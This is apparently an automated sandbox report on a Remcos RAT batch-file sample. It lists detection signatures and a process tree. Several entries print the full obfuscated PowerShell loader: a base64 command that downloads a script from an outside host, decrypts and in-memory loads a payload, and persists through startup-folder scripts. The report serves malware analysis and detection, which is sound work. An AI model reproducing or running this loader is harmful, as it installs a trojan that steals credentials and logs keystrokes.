Windows Analysis Report
5kldoushde.bat

Overview

General Information

Sample name: 5kldoushde.bat
renamed because original name is a hash value
Original sample name: 5dfaf610562ef70dcaff981d40952776ddd03d5171cdc99d85b735d3436d6e41.bat
Analysis ID: 1612237
MD5: 6ce4130989ecc8c8a5b9dcfb2fce5bbc
SHA1: 0539081ca0c3f3306d4a3057e48d51b713a39b8f
SHA256: 5dfaf610562ef70dcaff981d40952776ddd03d5171cdc99d85b735d3436d6e41
Tags: abokirem-duckdns-org, bat, user-JAMESWT_MHT

Detection

Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4984 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3676 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 1356 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6084 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 2368 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6308 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6860 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6616 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 3604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4568 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4980 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4780 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 280 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1756 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
